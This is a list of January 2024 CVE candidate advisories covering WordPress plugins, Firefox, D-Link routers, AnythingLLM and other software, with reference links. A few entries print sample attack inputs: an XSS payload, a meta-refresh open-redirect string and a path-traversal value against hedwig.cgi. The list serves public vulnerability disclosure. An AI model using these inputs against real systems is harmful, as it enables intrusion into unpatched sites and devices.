CVE 2024 790 Candidate The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8.1. This is due to missing or incorrect nonce validation on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions. This makes it possible for unauthenticated attackers to create, modify and delete taxonomy terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Furthermore, the functions wpbe_save_options, wpbe_bulk_delete_posts_count, wpbe_bulk_delete_posts, and wpbe_save_meta are vulnerable to Cross-Site Request Forgery allowing for plugin options update, post count deletion, post deletion and modification of post metadata via forged request. MISC:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php | URL:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve Assigned (20240122)
CVE 2024 788 Candidate SUPERAntiSpyware Pro X v10.0.1260 is vulnerable to kernel-level API parameters manipulation and Denial of Service vulnerabilities by triggering the 0x9C402140 IOCTL code of the saskutil64.sys driver. MISC:https://fluidattacks.com/advisories/brubeck/ | URL:https://fluidattacks.com/advisories/brubeck/ | MISC:https://www.superantispyware.com/professional-x-edition.html | URL:https://www.superantispyware.com/professional-x-edition.html Assigned (20240122)
CVE 2024 786 Candidate The Conversios – Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the ee_syncProductCategory function using the parameters conditionData, valueData, productArray, exclude and include in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979 | URL:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1979 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve Assigned (20240122)
CVE 2024 784 Candidate A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700. MISC:https://github.com/biantaibao/octopus_SQL/blob/main/report.md | URL:https://github.com/biantaibao/octopus_SQL/blob/main/report.md | MISC:https://vuldb.com/?ctiid.251700 | URL:https://vuldb.com/?ctiid.251700 | MISC:https://vuldb.com/?id.251700 | URL:https://vuldb.com/?id.251700 Assigned (20240122)
CVE 2024 783 Candidate A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699. MISC:https://github.com/keru6k/Online-Admission-System-RCE-PoC | URL:https://github.com/keru6k/Online-Admission-System-RCE-PoC | MISC:https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py | URL:https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py | MISC:https://vuldb.com/?ctiid.251699 | URL:https://vuldb.com/?ctiid.251699 | MISC:https://vuldb.com/?id.251699 | URL:https://vuldb.com/?id.251699 Assigned (20240122)
CVE 2024 782 Candidate A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing | URL:https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing | MISC:https://vuldb.com/?ctiid.251698 | URL:https://vuldb.com/?ctiid.251698 | MISC:https://vuldb.com/?id.251698 | URL:https://vuldb.com/?id.251698 Assigned (20240122)
CVE 2024 781 Candidate A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input <meta http-equiv="refresh" content="0; url=https://vuldb.com" /> leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability. MISC:https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS | URL:https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS | MISC:https://vuldb.com/?ctiid.251697 | URL:https://vuldb.com/?ctiid.251697 | MISC:https://vuldb.com/?id.251697 | URL:https://vuldb.com/?id.251697 Assigned (20240122)
CVE 2024 780 Candidate The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation when resetting its database, allowing any authenticated users, such as subscriber to perform such action MISC:https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/ | URL:https://wpscan.com/vulnerability/be3045b1-72e6-450a-8dd2-4702a9328447/ Assigned (20240122)
CVE 2024 779 Candidate The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation and CSRF in various function hooked to admin_init, allowing unauthenticated users to call them and unlink arbitrary users Instagram Account for example MISC:https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/ | URL:https://wpscan.com/vulnerability/ced134cf-82c5-401b-9476-b6456e1924e2/ Assigned (20240122)
CVE 2024 778 Candidate ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. MISC:https://github.com/dezhoutorizhao/cve/blob/main/rce.md | URL:https://github.com/dezhoutorizhao/cve/blob/main/rce.md | MISC:https://vuldb.com/?ctiid.251696 | URL:https://vuldb.com/?ctiid.251696 | MISC:https://vuldb.com/?id.251696 | URL:https://vuldb.com/?id.251696 Assigned (20240122)
CVE 2024 776 Candidate A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input <div onmouseenter="alert("xss)"> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability. MISC:https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf | URL:https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf | MISC:https://vuldb.com/?ctiid.251678 | URL:https://vuldb.com/?ctiid.251678 | MISC:https://vuldb.com/?id.251678 | URL:https://vuldb.com/?id.251678 Assigned (20240121)
CVE 2024 775 Candidate A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free. MISC:RHBZ#2259414 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259414 | MISC:https://access.redhat.com/security/cve/CVE-2024-0775 | URL:https://access.redhat.com/security/cve/CVE-2024-0775 | MISC:https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162 | URL:https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162 Assigned (20240121)
CVE 2024 774 Candidate A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.251674 | URL:https://vuldb.com/?ctiid.251674 | MISC:https://vuldb.com/?id.251674 | URL:https://vuldb.com/?id.251674 | MISC:https://youtu.be/f_4eHkISrZg | URL:https://youtu.be/f_4eHkISrZg Assigned (20240121)
CVE 2024 773 Candidate A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability. MISC:https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing | URL:https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing | MISC:https://vuldb.com/?ctiid.251677 | URL:https://vuldb.com/?ctiid.251677 | MISC:https://vuldb.com/?id.251677 | URL:https://vuldb.com/?id.251677 Assigned (20240121)
CVE 2024 772 Candidate A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.251672 | URL:https://vuldb.com/?ctiid.251672 | MISC:https://vuldb.com/?id.251672 | URL:https://vuldb.com/?id.251672 | MISC:https://youtu.be/WIeWeuXbkiY | URL:https://youtu.be/WIeWeuXbkiY Assigned (20240121)
CVE 2024 771 Candidate A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://vuldb.com/?ctiid.251671 | URL:https://vuldb.com/?ctiid.251671 | MISC:https://vuldb.com/?id.251671 | URL:https://vuldb.com/?id.251671 | MISC:https://youtu.be/eecN5mC0avU | URL:https://youtu.be/eecN5mC0avU Assigned (20240121)
CVE 2024 770 Candidate A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://imagebin.ca/v/7nx8zv3l62Kf | URL:https://imagebin.ca/v/7nx8zv3l62Kf | MISC:https://vuldb.com/?ctiid.251670 | URL:https://vuldb.com/?ctiid.251670 | MISC:https://vuldb.com/?id.251670 | URL:https://vuldb.com/?id.251670 Assigned (20240121)
CVE 2024 769 Candidate ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. MISC:https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md | URL:https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md | MISC:https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371 | URL:https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371 | MISC:https://vuldb.com/?ctiid.251666 | URL:https://vuldb.com/?ctiid.251666 | MISC:https://vuldb.com/?id.251666 | URL:https://vuldb.com/?id.251666 Assigned (20240120)
CVE 2024 768 Candidate The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.4.4. This is due to missing or incorrect nonce validation on the ajax_theme_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed themes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367 | URL:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve Assigned (20240119)
CVE 2024 767 Candidate The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on the ajax_plugin_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332 | URL:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve Assigned (20240119)
CVE 2024 766 Candidate The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the templates_ajax_request function in all versions up to, and including, 1.4.4. This makes it possible for subscribers and higher to create templates. MISC:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php | URL:https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve Assigned (20240119)
CVE 2024 765 Candidate As a default user on a multi-user instance of AnythingLLM, you could execute a call to the `/export-data` endpoint of the system and then unzip and read that export that would enable you do exfiltrate data of the system at that save state. This would require the attacked to be granted explicit access to the system, but they can do this at any role. Additionally, post-download, the data is deleted so no evidence would exist that the exfiltration occured. MISC:https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2 | URL:https://github.com/mintplex-labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2 | MISC:https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786 | URL:https://huntr.com/bounties/8978ab27-710c-44ce-bfd8-a2ea416dc786 Assigned (20240119)
CVE 2024 763 Candidate Any user can delete an arbitrary folder (recursively) on a remote server due to bad input sanitization leading to path traversal. The attacker would need access to the server at some privilege level since this endpoint is protected and requires authorization. MISC:https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c | URL:https://github.com/mintplex-labs/anything-llm/commit/8a7324d0e77a15186e1ad5e5119fca4fb224c39c | MISC:https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5 | URL:https://huntr.com/bounties/25a2f487-5a9c-4c7f-a2d3-b0527db73ea5 Assigned (20240119)
CVE 2024 761 Candidate The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers, to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access. MISC:https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php | URL:https://plugins.trac.wordpress.org/changeset/3023403/wp-file-manager/trunk/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php | MISC:https://wordpress.org/plugins/wp-file-manager/ | URL:https://wordpress.org/plugins/wp-file-manager/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve Assigned (20240119)
CVE 2024 759 Candidate Should an instance of AnythingLLM be hosted on an internal network and the attacked be explicitly granted a permission level of manager or admin, they could link-scrape internally resolving IPs of other services that are on the same network as AnythingLLM. This would require the attacker also be able to guess these internal IPs as `/*` ranging is not possible, but could be brute forced. There is a duty of care that other services on the same network would not be fully open and accessible via a simple CuRL with zero authentication as it is not possible to set headers or access via the link collector. MISC:https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb | URL:https://github.com/mintplex-labs/anything-llm/commit/0db6c3b2aa1787a7054ffdaba975474f122c20eb | MISC:https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b | URL:https://huntr.com/bounties/9a978edd-ac94-41fc-8e3e-c35441bdd12b Assigned (20240119)
CVE 2024 758 Candidate MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles. MISC:https://github.com/advisories/GHSA-2pwh-52h7-7j84 | URL:https://github.com/advisories/GHSA-2pwh-52h7-7j84 | MISC:https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84 | URL:https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84 Assigned (20240119)
CVE 2024 755 Candidate Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 | URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1868456%2C1871445%2C1873701 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 754 Candidate Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871605 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871605 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ Assigned (20240119)
CVE 2024 753 Candidate In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1870262 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1870262 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 752 Candidate A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1866840 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1866840 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ Assigned (20240119)
CVE 2024 751 Candidate A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1865689 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1865689 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 750 Candidate A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1863083 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1863083 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 749 Candidate A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122 and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1813463 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1813463 | MISC:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MISC:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ Assigned (20240119)
CVE 2024 748 Candidate A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1783504 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1783504 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ Assigned (20240119)
CVE 2024 747 Candidate When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1764343 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1764343 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 746 Candidate A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1660223 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1660223 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-02/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-02/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-04/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-04/ | MLIST:[debian-lts-announce] 20240125 [SECURITY] [DLA 3720-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3727-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html Assigned (20240119)
CVE 2024 745 Candidate The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871838 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871838 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ Assigned (20240119)
CVE 2024 744 Candidate In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871089 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871089 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ Assigned (20240119)
CVE 2024 743 Candidate An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.9, and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1867408 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1867408 | MISC:https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html | MISC:https://www.mozilla.org/security/advisories/mfsa2024-01/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-01/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240119)
